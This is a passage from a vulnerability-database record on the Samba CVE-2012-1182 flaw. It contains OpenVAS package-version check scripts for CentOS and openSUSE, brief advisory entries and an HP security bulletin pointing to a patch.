USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. 
(CVE-2012-1182)\n \n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n \n This update also fixes the following bugs:\n \n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n \n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n \n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"evolution-mapi on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\");\n script_id(881654);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:29 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0515\");\n script_name(\"CentOS Update for evolution-mapi CESA-2013:0515 centos6 \");\n\n script_tag(name: \"summary\" , 
value: \"Check for the Version of evolution-mapi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:06:20", "description": "Check for the Version of update", "cvss3": {}, "published": "2012-12-13T00:00:00", "type": "openvas", "title": "SuSE Update for update openSUSE-SU-2012:0507-1 (update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182", "CVE-2012-0870"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:850203", "href": "http://plugins.openvas.org/nasl.php?oid=850203", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0507_1.nasl 8336 2018-01-09 07:01:48Z teissa $\n#\n# SuSE Update for update openSUSE-SU-2012:0507-1 (update)\n#\n# Authors:\n# 
System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"- Add the ldapsmb sources as otherwise patches against them have\n no chance to apply.\n\n - Samba versions before 3.6.4 are affected by a vulnerability that\n allows remote code execution as the "root" user; PIDL\n based autogenerated code allows overwriting beyond the\n allocated array; CVE-2012-1182; (bso#8815); (bnc#752797).\n\n - s3-winbindd: Only use SamLogonEx when we can get\n unencrypted session keys; (bso#8599).\n - Correctly handle DENY ACEs when privileges apply;\n (bso#8797).\n\n - s3:smb2_server: fix a logic error, we should sign non\n guest sessions; (bso8749).\n - Allow vfs_aio_pthread to build as a static module;\n (bso#8723).\n - s3:dbwrap_ctdb: return the number of records in\n db_ctdb_traverse() for persistent dbs; (#bso8527).\n - s3: segfault in dom_sid_compare(bso#8567).\n - Honor SeTakeOwnershipPrivilege when client asks for\n SEC_STD_WRITE_OWNER; (bso#8768).\n - s3-winbindd: Close netlogon connection if the status\n returned by the NetrSamLogonEx call is timeout in the\n pam_auth_crap path; (bso#8771).\n - s3-winbindd: set the can_do_validation6 also for 
trusted\n domain; (bso#8599).\n - Fix problem when calculating the share security mask,\n take priviliges into account for the connecting user;\n (bso#8784).\n\n - Fix crash in dcerpc_lsa_lookup_sids_noalloc() with over\n 1000 groups; (bso#8807); (bnc#751454).\n\n - Remove obsoleted Authors lines from spec file for\n post-11.2 systems.\n\n - Make ldapsmb build with Fedora 15 and 16; (bso#8783).\n - BuildRequire libuuid-devel for post-11.0 and other\n systems.\n - Define missing python macros for non SUSE systems.\n - PreReq to fillup_prereq and insserv_prereq only on SUSE\n systems.\n - Always use cifstab instead of smbfstab on non SUSE\n systems.\n\n - Ensure AndX offsets are increasing strictly monotonically\n in pre-3.4 versions; CVE-2012-0870; (bnc#747934).\n\n - Add SERVERID_UNIQUE_ID_NOT_TO_VERIFY; (bso#8760);\n (bnc#741854).\n\n - s3-printing: fix crash in printer_list_set_printer();\n (bso#8762); (bnc#746825).\";\n\ntag_affected = \"update on openSUSE 12.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850203);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:59 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0870\", \"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0507_1\");\n script_name(\"SuSE Update for update openSUSE-SU-2012:0507-1 (update)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", 
\"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~34.11.1\", 
rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", 
rpm:\"libwbclient0-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~34.11.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "description": "No description provided", "edition": 1, "cvss3": {}, "published": "2012-06-17T00:00:00", "title": "HP Server Automation code execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:VULN:12426", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12426", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:46", "description": "Array index overflow on RPC request 
processing.", "edition": 1, "cvss3": {}, "published": "2012-04-19T00:00:00", "title": "Samba array index overflow", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-19T00:00:00", "id": "SECURITYVULNS:VULN:12328", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12328", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03366886\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03366886\r\nVersion: 1\r\n\r\nHPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-06-11\r\nLast Updated: 2012-06-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Server\r\nAutomation for Linux and SunOS. This vulnerability could by exploited\r\nremotely resulting in the execution of arbitrary code. 
The vulnerability is\r\nin Samba which is used in HP Server Automation.\r\n\r\nReferences: CVE-2012-1182\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Server Automation v7.8x, v9.0x, v9.1x on RedHat Linux, Suse Linux, and\r\nSunOS\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2012-1182 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Server Automation Patch SRVA_00127.tar.gz to resolve this\r\nissue. The patch is available on HP's SSO here:\r\nhttp://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_SRVA_00127\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 11 June 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. 
